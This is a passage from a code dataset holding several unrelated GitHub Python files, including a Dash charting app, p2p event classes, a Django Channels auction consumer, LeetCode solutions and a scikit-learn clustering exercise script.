'value': 6},\r\n\t {'label': 'Simple pie chart', 'value': 7},\r\n\t {'label': 'Styled pie chart', 'value': 8},\r\n\t {'label': 'Donuts type pie chart', 'value': 9},\r\n\t {'label': 'Simple bar chart', 'value': 10},\r\n\t {'label': 'Grouped/stacked bar chart', 'value': 11},\r\n\t {'label': 'Simple vertical histogram', 'value': 12},\r\n\t {'label': 'Simple horizontal histogram', 'value': 13},\r\n\t {'label': 'Overlaid histograms', 'value': 14},\r\n\t {'label': 'Simple vertical box plot', 'value': 15},\r\n\t {'label': 'Simple horizontal box plot', 'value': 16},\r\n\t {'label': 'Simple table', 'value': 17},\r\n\t {'label': 'Styled table', 'value': 18},\r\n\t {'label': 'Pandas Scatter plot', 'value': 19},\r\n\t {'label': 'Pandas Histogram (absolute values)', 'value': 20},\r\n\t {'label': 'Pandas Histogram (percentage changes)', 'value': 21},\r\n\t {'label': 'Pandas Box plot', 'value': 22},\r\n\t {'label': 'Pandas Corr plot', 'value': 23}\r\n\r\n\t ], placeholder='Please, select a plot'),\r\n\t\t\t\r\n\t\t\thtml.Button(id='submit', n_clicks=0, children='Submit'),\r\n\t\t\t], className=\"four columns\")]),\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div([\r\n\t\t\tdcc.Graph(id=\"plot1\")],\r\n\t\t\tclassName=\"six columns\"),\r\n\r\n\t\t\thtml.Div([\r\n\t\t\tdcc.SyntaxHighlighter(id=\"syntax1\")],\r\n\t\t\tclassName=\"six columns\"),\r\n\r\n\t\t\t], className=\"twelve columns\"),\r\n\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div(\"red\"),\r\n\t\t\thtml.Div([dcc.Slider(id = 'red_range', min=0, max=255, value=200)],\r\n\t\t\tclassName=\"twelve columns\"),\t\r\n\t\t\t], className=\"twelve columns\"),\r\n\t\t\r\n\thtml.Div([\r\n\t\t\thtml.Div(\"blue\"),\r\n\t\t\thtml.Div([dcc.Slider(id = 'blue_range', min=0, max=255, value=200)],\r\n\t\t\tclassName=\"twelve columns\"),\t\r\n\t\t\t], className=\"twelve columns\"),\r\n\r\n\thtml.Div([\r\n\t\t\thtml.Div(\"green\"),\r\n\t\t\thtml.Div([dcc.Slider(id = 'green_range', min=0, max=255, value=200)],\r\n\t\t\tclassName=\"twelve columns\"),\t\r\n\t\t\t\r\n\t\t\t], className=\"twelve columns\")\r\n])\r\n\r\n \r\n\r\n\r\n#dropdown plot\r\n\r\n@app.callback(\r\n Output(component_id='plot1', component_property='figure'),\r\n [Input(component_id='submit', component_property='n_clicks')],\r\n [State(component_id='dropdown', component_property='value'),\r\n State(component_id='red_range', component_property='value'),\r\n\tState(component_id='green_range', component_property='value'),\r\n\tState(component_id='blue_range', component_property='value')])\r\n\t\r\n\r\ndef update_graph(clicks, input_value1, red, green, blue):\r\n\tprint(input_value1)\r\n\tcolor=\"rgba(\"+str(red)+\",\"+str(green)+\",\"+str(blue)+\",0.5)\"\r\n\tif input_value1==1:\r\n\t\treturn make_sp1(color)\r\n\tif input_value1==2:\r\n\t\treturn make_sp2(color)\r\n\tif input_value1==3:\r\n\t\treturn make_sp3(color)\r\n\tif input_value1==4:\r\n\t\treturn make_sl1(color)\r\n\tif input_value1==5:\r\n\t\treturn make_sl2(color)\r\n\tif input_value1==6:\r\n\t\treturn make_sl3(color)\r\n\tif input_value1==7:\r\n\t\treturn make_pie1(color)\r\n\tif input_value1==8:\r\n\t\treturn make_pie2(color)\r\n\tif input_value1==9:\r\n\t\treturn make_pie3(color)\r\n\tif input_value1==10:\r\n\t\treturn make_bar1(color)\r\n\tif input_value1==11:\r\n\t\treturn make_bar2(color)\r\n\tif input_value1==12:\r\n\t\treturn make_hist1(color)\r\n\tif input_value1==13:\r\n\t\treturn make_hist2(color)\r\n\tif input_value1==14:\r\n\t\treturn make_hist3(color)\r\n\tif input_value1==15:\r\n\t\treturn make_box1(color)\r\n\tif input_value1==16:\r\n\t\treturn 
make_box2(color)\r\n\tif input_value1==17:\r\n\t\treturn make_t1(color)\r\n\tif input_value1==18:\r\n\t\treturn make_t2(color)\r\n\tif input_value1==19:\r\n\t\treturn make_ps1(color)\r\n\tif input_value1==20:\r\n\t\treturn make_ph1(color)\r\n\tif input_value1==21:\r\n\t\treturn make_ph2(color)\r\n\tif input_value1==22:\r\n\t\treturn make_pb1(color)\r\n\tif input_value1==23:\r\n\t\treturn make_pc1(color)\r\n\t\r\n\r\n\treturn make_sp1(color)\r\n\r\n#dropdown syntax\r\n\r\n@app.callback(\r\n Output(component_id='syntax1', component_property='children'),\r\n [Input(component_id='submit', component_property=\"n_clicks\")],\r\n [State(component_id='dropdown', component_property='value'),\r\n State(component_id='red_range', component_property='value'),\r\n\tState(component_id='green_range', component_property='value'),\r\n\tState(component_id='blue_range', component_property='value')])\r\n\t\r\n\r\ndef update_graph(clicks, input_value2, red, green, blue):\r\n\r\n\tcolor=\"rgba(\"+str(red)+\",\"+str(green)+\",\"+str(blue)+\",0.5)\"\r\n\t\r\n\tif input_value2==1:\r\n\t\treturn code_sp1(color)\r\n\tif input_value2==2:\r\n\t\treturn code_sp2(color)\r\n\tif input_value2==3:\r\n\t\treturn code_sp3(color)\r\n\tif input_value2==4:\r\n\t\treturn code_sl1(color)\r\n\tif input_value2==5:\r\n\t\treturn code_sl2(color)\r\n\tif input_value2==6:\r\n\t\treturn code_sl3(color)\r\n\tif input_value2==7:\r\n\t\treturn code_pie1(color)\r\n\tif input_value2==8:\r\n\t\treturn code_pie2(color)\r\n\tif input_value2==9:\r\n\t\treturn code_pie3(color)\r\n\tif input_value2==10:\r\n\t\treturn code_bar1(color)\r\n\tif input_value2==11:\r\n\t\treturn code_bar2(color)\r\n\tif input_value2==12:\r\n\t\treturn code_hist1(color)\r\n\tif input_value2==13:\r\n\t\treturn code_hist2(color)\r\n\tif input_value2==14:\r\n\t\treturn code_hist3(color)\r\n\tif input_value2==15:\r\n\t\treturn code_box1(color)\r\n\tif input_value2==16:\r\n\t\treturn code_box2(color)\r\n\tif input_value2==17:\r\n\t\treturn code_t1(color)\r\n\tif input_value2==18:\r\n\t\treturn code_t2(color)\r\n\tif input_value2==19:\r\n\t\treturn code_ps1(color)\r\n\tif input_value2==20:\r\n\t\treturn code_ph1(color)\r\n\tif input_value2==21:\r\n\t\treturn code_ph2(color)\r\n\tif input_value2==22:\r\n\t\treturn code_pb1(color)\r\n\tif input_value2==23:\r\n\t\treturn code_pc1(color)\r\n\r\n\treturn code_sp1(color)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server()","repo_name":"VaroojanK/Final_Project","sub_path":"Project_dash.py","file_name":"Project_dash.py","file_ext":"py","file_size_in_byte":6712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16592639157","text":"from abc import (\n ABC,\n abstractmethod,\n)\nfrom typing import (\n Type,\n)\n\nfrom lahja import (\n BaseEvent,\n BaseRequestResponseEvent,\n)\n\nfrom p2p.kademlia import Node\nfrom p2p.p2p_proto import (\n DisconnectReason,\n)\nfrom p2p.protocol import (\n Command,\n PayloadType,\n)\n\n\nclass HasRemoteEvent(BaseEvent, ABC):\n \"\"\"\n Abstract base event for event types that carry a ``Node`` on the ``remote`` property.\n \"\"\"\n\n @property\n @abstractmethod\n def remote(self) -> Node:\n pass\n\n\nclass ConnectToNodeCommand(HasRemoteEvent):\n \"\"\"\n Event that wraps a node URI that the pool should connect to.\n \"\"\"\n\n def __init__(self, remote: Node) -> None:\n self._remote = remote\n\n @property\n def remote(self) -> Node:\n return self._remote\n\n\nclass PeerCountResponse(BaseEvent):\n \"\"\"\n Response event that wraps the count 
of peers connected to the pool.\n \"\"\"\n\n def __init__(self, peer_count: int) -> None:\n self.peer_count = peer_count\n\n\nclass PeerCountRequest(BaseRequestResponseEvent[PeerCountResponse]):\n \"\"\"\n Request event to get the count of peers connected to the pool.\n \"\"\"\n\n @staticmethod\n def expected_response_type() -> Type[PeerCountResponse]:\n return PeerCountResponse\n\n\nclass DisconnectPeerEvent(HasRemoteEvent):\n \"\"\"\n Event broadcasted when we want to disconnect from a peer\n \"\"\"\n\n def __init__(self, remote: Node, reason: DisconnectReason) -> None:\n self._remote = remote\n self.reason = reason\n\n @property\n def remote(self) -> Node:\n return self._remote\n\n\nclass PeerPoolMessageEvent(HasRemoteEvent):\n \"\"\"\n Base event for all peer messages that are relayed on the event bus. The events are mapped\n to individual subclasses for every different ``cmd`` to allow efficient consumption through\n the event bus.\n \"\"\"\n\n def __init__(self, remote: Node, cmd: Command, msg: PayloadType) -> None:\n self._remote = remote\n self.cmd = cmd\n self.msg = msg\n\n @property\n def remote(self) -> Node:\n return self._remote\n","repo_name":"teknomise/trinity","sub_path":"trinity/protocol/common/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"23359406867","text":"import json\nimport os\n\nimport django\nimport requests\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"tender_hack_back.settings\")\ndjango.setup()\n\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom competence.models import CompanyQuotationSession, Company, QuotationSession\nfrom session_emulator.models import Lot\n\n\n@database_sync_to_async\ndef create_lot(company_id: int, session: int, prise: int):\n company = Company.objects.get(id=company_id)\n quotation_session = QuotationSession.objects.get(id=session)\n quotation_session.current_price = prise\n quotation_session.save(update_fields=[\"current_price\"])\n comp_quotation_session = CompanyQuotationSession.objects.get_or_create(\n company=company, quotation_session=quotation_session, is_bot=False\n )\n if CompanyQuotationSession.is_bot:\n r = requests.get(\"http://127.0.0.1:5000/\")\n dat = r.json()[\"push_lot_prediction\"]\n if dat:\n Lot.objects.create(\n comp_quotation_session=comp_quotation_session[0], price=prise * 0.99\n )\n return prise * 0.99, quotation_session.company.id\n return None, None\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.room_name = self.scope[\"url_route\"][\"kwargs\"][\"room_name\"]\n self.room_group_name = \"chat_%s\" % self.room_name\n\n # Join room group\n await self.channel_layer.group_add(self.room_group_name, self.channel_name)\n\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave room group\n await self.channel_layer.group_discard(self.room_group_name, self.channel_name)\n\n # Receive message from WebSocket\n async def receive(self, text_data):\n data = text_data.split(\" \")\n company_id = int(data[0])\n lot = float(data[1])\n company2_id = int(data[2])\n session = self.room_group_name.split(\"_\")[1]\n prise, company3_id = await create_lot(company_id, int(session), lot)\n if prise:\n mes = [lot, prise]\n else:\n mes = [lot]\n # Send message to room group\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n \"type\": \"chat_message\",\n \"message\": 
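mes, # payload is [lot] or [lot, counter_price] when the pricing bot replied (editor's comment)\n 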
\"company_id\": company_id,\n \"company2_id\": company2_id,\n \"company3_id\": company3_id,\n },\n )\n\n # Receive message from room group\n async def chat_message(self, event):\n message = event[\"message\"]\n company_id = event[\"company_id\"]\n company2_id = event[\"company2_id\"]\n company3_id = event[\"company3_id\"]\n\n # Send message to WebSocket\n await self.send(\n text_data=json.dumps(\n {\n \"lot\": message,\n \"bot\": False,\n \"company\": company_id,\n \"company2\": company2_id,\n \"company3\": company3_id,\n }\n )\n )\n","repo_name":"Alexander-D-Karpov/tender_hack_back","sub_path":"session_emulator/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"10789165835","text":"# Time: O(n)\n# Space: O(n)\n\nclass Solution(object):\n def numDifferentIntegers(self, word):\n \"\"\"\n :type word: str\n :rtype: int\n \"\"\"\n result, num = set(), None\n for i in xrange(len(word)+1):\n c = word[i] if i < len(word) else ' '\n if c.isdigit():\n num = 10*num+int(c) if num is not None else int(c)\n elif num is not None:\n result.add(num)\n num = None\n return len(result)\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/number-of-different-integers-in-a-string.py","file_name":"number-of-different-integers-in-a-string.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"}
{"seq_id":"7540592719","text":"# Maps an index that runs past the end of the array back into range (wrap-around)\ndef get_func(number, length):\n if number >= length:\n return number - length\n return number\n\nfrom typing import List\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n n = nums\n l, r = 0, len(nums)-1\n max_value = max(n[l], n[r])\n max_value_idx = l if n[l] > n[r] else r\n\n # Find the maximum value (the rotation pivot)\n while l <= r:\n m = (l+r)//2\n if n[l] > max(n[m], n[r]):\n if n[l] > max_value:\n max_value = n[l]\n max_value_idx = l\n r = m-1\n else:\n if n[m] > n[r] and n[m] > max_value:\n max_value = n[m]\n max_value_idx = m\n elif n[m] < n[r] and n[r] > max_value:\n max_value = n[r]\n max_value_idx = r\n l = m+1\n\n # Binary-search from the maximum onward, letting indices run past the end (wrapped via get_func)\n l = max_value_idx + 1\n r = max_value_idx + len(nums)\n\n while l <= r:\n m = (l+r)//2\n ml = get_func(m, len(nums))\n if n[ml] == target:\n return ml\n elif n[ml] < target:\n l = m+1\n else:\n r = m-1\n return -1\n\n\nprint(Solution().search([4,5,6,7,0,1,2],0))\n# print(Solution().search([1],0))\n# print(Solution().search([1,3],1))\n# print(Solution().search([3,1],0))\n","repo_name":"chickenchickenlove/leetcode","sub_path":"medium/lc33.py","file_name":"lc33.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"22188422814","text":"from .. 
import Channel\nfrom .config import API, CHANNEL, READ_KEY, WRITE_KEY, FIELDS, DEST_URL\nimport simplejson as json\nimport random\n\n\nclass TestPySpeak:\n\n def setup(self):\n self.test_channel = Channel(\n CHANNEL, DEST_URL, API, READ_KEY, WRITE_KEY)\n self.updates = dict()\n\n def generate_random_update_values(self):\n for field in FIELDS:\n self.updates[field] = random.randint(1, 100)\n\n def test_get_channel_feed_is_dictionary(self):\n test_channel_feed = self.test_channel.get_channel_feed()\n assert ((type(test_channel_feed) == dict)\n & (len(test_channel_feed) > 0))\n\n def test_get_field_feed_is_dictionary(self):\n test_field_feed = self.test_channel.get_field_feed('field2')\n assert ((type(test_field_feed) == dict)\n & (len(test_field_feed) > 0))\n\n def test_update_and_read_channel(self):\n self.generate_random_update_values()\n self.test_channel.update_channel(self.updates)\n test_json = self.test_channel.get_channel_feed(last_entry=True)\n\n for field in FIELDS:\n assert(int(test_json[field]) == self.updates[field])\n\n def test_update_and_read_field(self):\n self.generate_random_update_values()\n self.test_channel.update_channel(self.updates)\n for field in FIELDS:\n test_json = self.test_channel.get_field_feed(\n field, last_entry=True)\n assert(int(test_json[field]) == self.updates[field])\n\n def test_post_pyspeak_data(self):\n self.generate_random_update_values()\n self.test_channel.update_channel(self.updates)\n source_response = json.dumps(self.test_channel.get_channel_feed())\n dest_response = self.test_channel.post_data()\n assert(dest_response.json()['form']['json_data'] == source_response)\n","repo_name":"raddevon/pyspeak","sub_path":"pyspeak/tests/test_channel.py","file_name":"test_channel.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"16810523862","text":"from django.shortcuts import render\nfrom django.utils.translation import ugettext as _\n\n\n# pylint: disable=unused-argument\ndef handler400(request, exception):\n ctx = {'code': 400, 'title': _('Bad request'),\n 'message': _('There was an error in your request.')}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 400\n return response\n\n # pylint: disable=unused-argument\ndef handler403(request, exception):\n ctx = {'code': 403, 'title': _('Forbidden'),\n 'message': _(\"You don't have the permission to access this page.\")}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 403\n return response\n\n # pylint: disable=unused-argument\ndef handler404(request, exception):\n ctx = {'code': 404, 'title': _('Page not found'),\n 'message': _('The page you requested could not be found.')}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 404\n return response\n\n # pylint: disable=unused-argument\ndef handler500(request):\n ctx = {'code': 500, 'title': _('Internal Server Error'),\n 'message': _('An unexpected error has occurred.')}\n response = render(request, 'error_handler/http_error.html', ctx)\n response.status_code = 500\n return response\n\n # pylint: disable=unused-argument\ndef csrf_failure(request, reason):\n return render(request, 
'error_handler/csrf_failure.html')\n","repo_name":"digitalfabrik/coldaid-backend","sub_path":"src/cms/views/error_handler/error_handler.py","file_name":"error_handler.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"12382277986","text":"def merge(intervals: list[list[int]]) -> list[list[int]]:\n result = []\n print(sorted(intervals))\n\n for interval in sorted(intervals):\n # print(interval)\n # print(type(interval))\n if result and interval[0] <= result[-1][1]:\n result[-1][1] = max(result[-1][1], interval[1])\n\n else:\n # print(type(interval))\n result.append(interval)\n\n return result\n\n\nprint(merge([[1, 3], [2, 6], [8, 10], [15, 18]]))\n","repo_name":"leeseungsoo0701/python_alogrithm","sub_path":"Sort/QuickSort/leetcode/59_구간병합.py","file_name":"59_구간병합.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18048297773","text":"eipservice_config_spec = {}\n\neipservice_config_spec['1'] = {\n 'description': 'sample eip service config',\n 'type': 'object',\n 'properties': {\n 'serial': {\n 'type': int,\n 'default': 1,\n 'required': [\"True\"]\n },\n 'version': {\n 'type': int,\n 'default': 1,\n 'required': [\"True\"]\n },\n 'clusters': {\n 'type': list,\n 'default': [\n {\"label\": {\n \"en\": \"Location Unknown\"},\n \"name\": \"location_unknown\"}]\n },\n 'gateways': {\n 'type': list,\n 'default': [\n {\"capabilities\": {\n \"adblock\": True,\n \"filter_dns\": True,\n \"ports\": [\"80\", \"53\", \"443\", \"1194\"],\n \"protocols\": [\"udp\", \"tcp\"],\n \"transport\": [\"openvpn\"],\n \"user_ips\": False},\n \"cluster\": \"location_unknown\",\n \"host\": \"location.example.org\",\n \"ip_address\": \"127.0.0.1\"}]\n },\n 'locations': {\n 'type': dict,\n 'default': {}\n },\n 'openvpn_configuration': {\n 'type': dict,\n 'default': {\n \"auth\": None,\n \"cipher\": None,\n \"tls-cipher\": None}\n }\n }\n}\n\n\ndef get_schema(version):\n \"\"\"\n Returns the schema corresponding to the version given.\n\n :param version: the version of the schema to get.\n :type version: str\n :rtype: dict or None if the version is not supported.\n \"\"\"\n schema = eipservice_config_spec.get(version, None)\n return schema\n","repo_name":"leapcode/bitmask_client","sub_path":"src/leap/bitmask/services/eip/eipspec.py","file_name":"eipspec.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"40"} +{"seq_id":"9880276710","text":"# Program to determine whether a year is a leap year or not.\r\n# Name: Buhlebezwe\r\n# Student Number: MBLBUH001\r\n# Date: 08 March 2014\r\n\r\nx = eval(input(\"Enter a year:\\n\"))\r\n\r\nif(x%400==0) or (x%4==0) and (x%100!=0):\r\n print(x,\"is a leap year.\")\r\nelse:\r\n print(x, \"is not a leap year.\")","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_2/mblbuh001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5660051441","text":"#!/usr/bin/python\nimport os\nOUTPUT_FILENAME = \"data/graph.dzn\"\n\ndef read_nodes(edge, parse_edges):\n ed = [int(x) for x in edge.split()]\n parse_edges[ed[0]].append(ed[1])\n parse_edges[ed[1]].append(ed[0])\n\n\ndef parse_graph(initial_graph):\n try:\n global V\n 
os.makedirs(os.path.dirname(OUTPUT_FILENAME), exist_ok=True)\n fp = open(f\"{initial_graph}\",'r',encoding = 'utf-8')\n V = fp.readline().strip()\n while(V[0] == \"#\"): \n V = fp.readline().strip() \n E = fp.readline().strip()\n edges = fp.readlines()\n \n graph = open(f\"{OUTPUT_FILENAME}\",'w',encoding = 'utf-8')\n graph.write(f\"V={V};\\n\")\n #graph.write(f\"E={E};\\n\")\n \n global parse_edges\n parse_edges = {List: [] for List in range(1, int(V)+1) } \n for edge in edges: \n read_nodes(edge, parse_edges)\n \n max_len = int(len(max(parse_edges.values(), key=len)))\n graph.write(f\"MAXLEN={max_len};\\n\")\n graph.write(f\"EDGES=[|\\n\") \n for key, value in parse_edges.items():\n filler = 0;\n for e in value:\n if(value.index(e) == max_len-1):\n graph.write(f\"{e}\")\n else:\n graph.write(f\"{e}, \")\n filler += 1\n \n while(filler < max_len and len(value) < max_len):\n if (filler == max_len -1 ):\n graph.write(f\"0\")\n else: \n graph.write(f\"0, \")\n filler += 1\n \n if (key == len(parse_edges)):\n graph.write('|];\\n')\n else:\n graph.write('|\\n')\n\n finally: \n fp.close()\n graph.close()\n return f\"{OUTPUT_FILENAME}\"\n","repo_name":"diogorainhalopes/SearchAndPlanning-22-23","sub_path":"parse_graph.py","file_name":"parse_graph.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23015893867","text":"'''Test file when users wpm updates'''\nfrom collections import OrderedDict\nimport os\nimport sys\nimport unittest\nsys.path.append(os.path.abspath('../'))\nimport app\n\n\nKEY_INPUT1 = \"input\"\nKEY_EXPECTED = \"expected\"\n\n\nclass UserUpdateTest(unittest.TestCase):\n '''Test class to check update_player_stats function works correctly'''\n def setUp(self):\n self.success_test_params = [{\n KEY_INPUT1: [[150, 1841], [3, 20]],\n KEY_EXPECTED: [50, 92.05]\n }, {\n KEY_INPUT1: [[65, 34, 175], [1, 2, 2]],\n KEY_EXPECTED: [65, 17, 87.5]\n }, {\n KEY_INPUT1: [[3451, 1475, 2471, 0], [28, 14, 30, 0]],\n KEY_EXPECTED: [123.25, 105.36, 82.37, 0]\n }, {\n KEY_INPUT1: [[3451, 1475, 2471, 0], [28, 14, 30, 0]],\n KEY_EXPECTED: [123.25, 105.36, 82.37, 0]\n }]\n\n def tests_update_player_stats_success(self):\n '''Test function to check all the players wpm updates appropriately'''\n for test in self.success_test_params:\n totalwpm, totalgames = (test[KEY_INPUT1])\n actual_result = app.find_average(totalwpm, totalgames)\n expected_result = test[KEY_EXPECTED]\n print(\"Success\", actual_result, expected_result)\n\n self.assertEqual(len(actual_result), len(expected_result))\n self.assertEqual(actual_result, expected_result)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Beat-The-Keys/BeatTheKeys","sub_path":"server/find_average_test.py","file_name":"find_average_test.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"5332110786","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, classification_report, confusion_matrix\n\n\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.cluster import DBSCAN\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nimport time\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom 
sklearn import tree\n\n\n\n\n\ndef k_means_clustering():\n datasetlist = [\"datos_1.csv\",\"datos_2.csv\",\"datos_3.csv\"]\n names = []\n i = 0\n for element in datasetlist:\n names.append(datasetlist[i].replace(\".csv\",\"\"))\n i = i + 1\n j = 0\n for dataset in datasetlist:\n dataset = pd.read_csv(dataset)\n for i in range(1,6): # 1 through 5 clusters\n k_means(i,dataset,names[j])\n j = j + 1\n\n\ndef k_means(number_of_clusers, dataset,datasetname):\n #Kmeans\n kmeans = KMeans(n_clusters=number_of_clusers)\n labels = kmeans.fit_predict(dataset)\n\n #Get Centroids\n centroids = kmeans.cluster_centers_\n plt.scatter(dataset['x'], dataset['y'], c=kmeans.labels_.astype(float), s=10, alpha=0.5)\n plt.scatter(centroids[:, 0], centroids[:, 1], s=80, color='k')\n\n #plt.savefig(r\"C:\\Users\\Burni\\Desktop\\Tarea-2_SistemasInteligentes\\kmeans\"+\"\\k_means_\"+str(datasetname)+\"_clusters\"+str(number_of_clusers))\n plt.savefig(\"Kmeans\\\\\"+str(datasetname)+\"_clusters\"+str(number_of_clusers))\n plt.cla()\n plt.clf()\n\ndef agglomerative_clustering():\n datasetlist = [\"datos_1.csv\", \"datos_2.csv\", \"datos_3.csv\"]\n names = []\n i = 0\n for element in datasetlist:\n names.append(datasetlist[i].replace(\".csv\", \"\"))\n i = i + 1\n j = 0\n for dataset in datasetlist:\n dataset = pd.read_csv(dataset)\n for i in range(1, 6): # 1 through 5 clusters\n agglomerative(i, None, dataset, names[j])\n distances = [0.25,0.50,0.75,1.0,1.5]\n for distance in distances:\n agglomerative(None,distance,dataset,names[j])\n j = j + 1\n\n\ndef agglomerative(number_of_clusters,distance,dataset,datasetname):\n save_location = \"\"\n if distance is None: #With clusters\n # Agglomerative Clustering \"Ward\"\n cluster = AgglomerativeClustering(n_clusters=number_of_clusters, affinity='euclidean', linkage='ward')\n cluster.fit_predict(dataset)\n save_location = \"Agglomerative Clustering\\\\\"+str(datasetname)+\"_clusters\"+str(number_of_clusters)\n else: #With distances\n # Agglomerative Clustering \"Ward:\n cluster = AgglomerativeClustering(n_clusters=None, distance_threshold=distance,affinity='euclidean',linkage=\"ward\")\n cluster.fit_predict(dataset)\n distance = str(distance).replace(\".\",\"_\")\n save_location = \"Agglomerative Clustering\\\\\" + str(datasetname) + \"_distance_\"+str(distance)\n plt.scatter(dataset['x'], dataset['y'], c=cluster.labels_, cmap='rainbow')\n plt.savefig(save_location)\n plt.cla()\n plt.clf()\n\ndef DBScan():\n datasetlist = [\"datos_1.csv\", \"datos_2.csv\", \"datos_3.csv\"]\n names = []\n i = 0\n for element in datasetlist:\n names.append(datasetlist[i].replace(\".csv\", \"\"))\n i = i + 1\n i = 0\n for dataset in datasetlist:\n dataset = pd.read_csv(dataset)\n neighbors_distance = [0.25,0.35,0.5]\n min_samples = [5, 10, 15]\n for distance in neighbors_distance: # 1 through 5 clusters\n for sample in min_samples:\n DB(distance,sample,dataset,names[i])\n #agglomerative(None, distance, dataset, names[j])\n i = i + 1\n\ndef DB(distance_between_neighbors, min_samples_neighborhood, dataset, datasetname):\n #Db Scan\n label = DBSCAN(eps=distance_between_neighbors, min_samples=min_samples_neighborhood).fit(dataset)\n #core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n #core_samples_mask[db.core_sample_indices_] = True\n labels = label.labels_\n\n n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)\n n_noise_ = list(labels).count(-1)\n\n\n\n #no_clusters = len(dataset.unique(labels))\n #no_noise = np.sum(dataset.array(labels) == -1, axis=0)\n plt.scatter(dataset['x'], 
dataset['y'], c=label.labels_)\n\n distance_between_neighbors = str(distance_between_neighbors).replace(\".\",\"_\")\n save_location = \"DBScan\\\\\"+str(datasetname)+\"_eps_\"+str(distance_between_neighbors)+\"_min_s_\"+str(min_samples_neighborhood)\n plt.savefig(save_location)\n plt.cla()\n plt.clf()\n\n\n\n\ndef knn():\n kays = [1,3,5,7,9,11,13,15]\n for k in kays:\n Ejercicio2(k)\n\ndef Ejercicio2(k):\n dataset = pd.read_csv(\"genero_peliculas_training.csv\")\n\n X = dataset.iloc[:, :-1]\n y = dataset.iloc[:, 10]\n labelEncoder_X = LabelEncoder()\n X = X.apply(LabelEncoder().fit_transform)\n Knn = KNeighborsClassifier(n_neighbors=k).fit(X,y)\n\n testing_dataset = pd.read_csv(\"genero_peliculas_testing.csv\")\n X2 = testing_dataset.iloc[:, :-1]\n X2 = X2.apply(LabelEncoder().fit_transform)\n y2 = testing_dataset.iloc[:, 10]\n\n start = time.time()\n y_pred = Knn.predict(X2)\n prediction_time = time.time() - start\n print(\"Analytics for: \"+\"on k: \"+str(k))\n\n print(\"\\n\")\n print(\"Prediction Time: \" + str(prediction_time))\n print(confusion_matrix(y2, y_pred, ))\n print(classification_report(y2, y_pred, zero_division=\"warn\"))\n\ndef decisicion_tree():\n modes = [\"gini\",\"entropy\"]\n max_depths = [2,3,4,5,None]\n for mode in modes:\n for max_depth in max_depths:\n Ejercicio3(mode,max_depth)\n\ndef Ejercicio3(mode, max_depth):\n dataset = pd.read_csv(\"genero_peliculas_training.csv\")\n\n\n #print(dataset)\n X = dataset.iloc[:, :-1]\n #print(\"X will be\")\n #print(X)\n y = dataset.iloc[:,10]\n #print(\"Y will be\")\n #print(y)\n\n labelEncoder_X = LabelEncoder()\n X = X.apply(LabelEncoder().fit_transform)\n #print(X)\n\n clf = DecisionTreeClassifier(criterion=mode,max_depth=max_depth).fit(X,y)\n testing_dataset = pd.read_csv(\"genero_peliculas_testing.csv\")\n X2 = testing_dataset.iloc[:, :-1]\n X2 = X2.apply(LabelEncoder().fit_transform)\n y2 = testing_dataset.iloc[:,10]\n #print(X2)\n #print(y2)\n start = time.time()\n y_pred = clf.predict(X2)\n prediction_time = time.time() - start\n print(\"Analytics for: \"+mode+\" on depth: \"+str(max_depth))\n print(\"Prediction Time: \"+str(prediction_time))\n\n print(\"\\n\")\n\n print(confusion_matrix(y2,y_pred,))\n print(classification_report(y2, y_pred, zero_division=\"warn\"))\n\n\n\n\nmenu = True\nwhile menu:\n print(\"*****Menu*****\")\n print(\"*Exercise 1*\")\n print(\"1. Kmeans.\")\n 